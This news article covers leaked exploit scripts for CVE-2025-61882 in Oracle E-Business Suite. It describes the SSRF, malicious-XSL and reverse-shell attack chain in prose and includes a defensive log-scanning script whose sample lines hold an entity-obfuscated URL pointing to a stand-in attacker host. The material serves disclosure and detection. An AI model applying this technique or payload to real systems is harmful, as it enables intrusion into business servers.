
Leaked Oracle EBS Exploit Fuels New Attack Wave (CVE-2025-61882)

Summary

– Researchers analyzed leaked exploit scripts for CVE-2025-61882 targeting Oracle EBS instances, but the specific threat actors behind them remain unknown.
– CVE-2025-61882 is not a single vulnerability but a chain of multiple weaknesses requiring deep Oracle EBS knowledge to exploit.
– The attack uses two Python scripts to send a crafted HTTP request with an encoded URL, leading to server-side request forgery and execution of a malicious XSL file.
– Successful exploitation grants attackers interactive system access via a reverse shell running under the Oracle user context.
– Organizations with internet-facing Oracle EBS instances should check for compromises and apply fixes, as ongoing exploitation is expected using these leaked scripts.

A newly disclosed and actively exploited vulnerability within Oracle’s E-Business Suite (EBS) is fueling a wave of attacks following the public leak of functional exploit scripts. Identified as CVE-2025-61882, this critical security flaw is not a single issue but rather a chain of interconnected weaknesses that, when combined, allow for complete system compromise. Security firms Resecurity and watchTowr have analyzed these leaked scripts, which are now circulating on platforms like Telegram, making sophisticated attacks accessible to a broader range of threat actors.

The origin of the leak remains uncertain: researchers have been unable to confirm whether the attackers belonged to the Cl0p or LAPSUS$ groups, to other entities, or to some combination of them. The exploit requires two distinct Python scripts to function. One script, Server.py, acts as an HTTP server that hosts the malicious payload. The other, exp.py, is the exploit client that tricks the Oracle EBS server into contacting the attacker’s server.

The attack mechanism involves a carefully crafted HTTP request sent to the target Oracle EBS instance. This request contains a `return_url` parameter that points to the attacker’s server. To slip past basic security filters, the URL is obfuscated as numeric HTML character entities (for example `&#104;` in place of the letter `h`), which the EBS server decodes before acting on the value. This manipulation forces the EBS server to fetch and process content from the attacker-controlled server, constituting a server-side request forgery (SSRF) attack.
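The obfuscation described above is also what makes the request stand out in web-server access logs: a legitimate `return_url` never contains `&#NNN;` sequences, and after decoding it should never point at a host other than the EBS instance itself. The following detection script is an added example, not code from the original article or from watchTowr or Resecurity. It scans constructed Apache-style access-log lines, peels off percent-encoding and HTML entities from `return_url`, and flags requests that are entity-obfuscated or that resolve to an untrusted host. The servlet path in the sample lines is a placeholder, not the real vulnerable endpoint; consult Oracle’s advisory for the actual paths and indicators. The `TRUSTED_HOSTS` set and the `203.0.113.5` / `198.51.100.23` addresses are assumptions for the example (TEST-NET ranges).

```python
"""Flag SSRF attempts that hide the return_url target behind numeric HTML entities.

Added example for illustration; not part of the original article or any vendor tooling.
"""
import html
import re
from urllib.parse import quote, unquote, urlsplit

# Hosts this EBS instance may legitimately be told to return to.
# ASSUMPTION for this example: replace with your own EBS hostnames (with port if used).
TRUSTED_HOSTS = {"ebs.corp.example", "ebs.corp.example:8000"}

# Combined-log-format prefix: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A numeric entity such as &#104; or &#x68; anywhere in a value.
ENTITY_RE = re.compile(r'&#(?:\d+|[xX][0-9a-fA-F]+);')
# Split the query on '&' only when it is a real parameter separator,
# not the '&' that opens an HTML entity (otherwise we would shred the payload).
PARAM_SEP = re.compile(r'&(?!#(?:\d+|[xX][0-9a-fA-F]+);)')


def to_entities(text):
    """Encode text as numeric HTML entities (used here only to build sample log lines)."""
    return "".join(f"&#{ord(c)};" for c in text)


def decode_param(value, max_rounds=3):
    """Undo the layers an attacker can stack: percent-encoding, then HTML entities.

    Repeats until the value stops changing so that '%26%23104%3B' (percent-encoded
    '&#104;') and a raw '&#104;' both end up as the letter 'h'.
    """
    cur = value
    for _ in range(max_rounds):
        nxt = html.unescape(unquote(cur))
        if nxt == cur:
            break
        cur = nxt
    return cur


def extract_params(query):
    """Parse a query string into {name: raw_value} without breaking on entity '&'."""
    params = {}
    for part in PARAM_SEP.split(query):
        if not part:
            continue
        name, _, value = part.partition("=")
        params[name] = value
    return params


def analyse_line(line):
    """Return a verdict dict for one log line, or None if it carries no return_url."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Do not use urlsplit() on the raw target: the '#' inside '&#104;' would be
    # mistaken for a fragment marker and the payload would be discarded.
    path, _, query = m.group("target").partition("?")
    raw = extract_params(query).get("return_url")
    if raw is None:
        return None
    decoded = decode_param(raw)
    obfuscated = bool(ENTITY_RE.search(unquote(raw)))
    host = urlsplit(decoded).netloc.lower()       # '' for a relative return_url
    external = host != "" and host not in TRUSTED_HOSTS
    return {
        "client": m.group("ip"),
        "path": path,
        "return_url": decoded,
        "entity_obfuscated": obfuscated,
        "external_target": external,
        "suspicious": obfuscated or external,
    }


def scan(lines):
    """Return the verdicts for every suspicious line."""
    return [r for r in (analyse_line(l) for l in lines) if r and r["suspicious"]]


# Constructed sample log lines (not real traffic). Two benign requests, then the same
# attacker URL sent as raw entities and as percent-encoded entities.
ATTACKER_URL = "http://203.0.113.5:8000/x.xsl"
PLACEHOLDER = "/OA_HTML/PLACEHOLDER_SERVLET"   # stand-in path, not the real endpoint
SAMPLE_LOG = [
    '10.0.0.7 - - [06/Oct/2025:09:12:01 +0000] "GET /OA_HTML/RF.jsp'
    '?return_url=%2FOA_HTML%2FRF.jsp HTTP/1.1" 200 512',
    '10.0.0.7 - - [06/Oct/2025:09:12:02 +0000] "GET /OA_HTML/RF.jsp'
    '?return_url=http%3A%2F%2Febs.corp.example%3A8000%2FOA_HTML%2FRF.jsp HTTP/1.1" 302 0',
    f'198.51.100.23 - - [06/Oct/2025:09:13:10 +0000] "POST {PLACEHOLDER}'
    f'?return_url={to_entities(ATTACKER_URL)} HTTP/1.1" 200 88',
    f'198.51.100.23 - - [06/Oct/2025:09:13:11 +0000] "POST {PLACEHOLDER}'
    f'?return_url={quote(to_entities(ATTACKER_URL), safe="")} HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['client']} {hit['path']} -> {hit['return_url']} "
              f"(entities={hit['entity_obfuscated']}, external={hit['external_target']})")
```

Run it against a real log by reading the lines from the EBS front-end (Apache/OHS) access log instead of `SAMPLE_LOG`; only the two attacker lines are reported, both decoding to the same external XSL URL. Treat any entity-obfuscated `return_url` as suspicious even when the decoded host looks internal, since the encoding itself has no legitimate use.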

Once the EBS server follows the manipulated URL, it retrieves a malicious XSL file. This file contains an embedded JavaScript payload that is subsequently decoded and executed on the server using Java’s `javax.script` API. The final stage of the attack sees the execution of this payload, which initiates a reverse shell connection back to a listener controlled by the attacker. This provides the threat actor with interactive access to the operating system, typically running with the privileges of the Oracle user.

It is still unclear whether the initial attackers relied solely on this vulnerability or used additional flaws to breach systems. Oracle initially suggested the attacks leveraged issues patched in July 2025 but has since removed that statement from its communications. What is almost certain is that the public availability of these exploit scripts will lead to a significant increase in attacks against internet-facing Oracle EBS instances.

According to threat intelligence from Mandiant, exploitation of this vulnerability and subsequent data theft operations began in August 2025. Many victim organizations are already aware of their compromised status, having received extortion emails from the Cl0p ransomware group. However, all organizations with externally accessible Oracle EBS instances are urged to immediately check for the indicators of compromise listed in Oracle’s security advisory for CVE-2025-61882 and to apply all relevant patches and configuration fixes.

To assist defenders, watchTowr researchers have released a script that can check if an Oracle E-Business Suite instance is vulnerable to this specific flaw. Furthermore, the Cybersecurity and Infrastructure Security Agency (CISA) has officially added CVE-2025-61882 to its Known Exploited Vulnerabilities catalog, mandating federal agencies to remediate the issue promptly.

(Source: HelpNet Security)
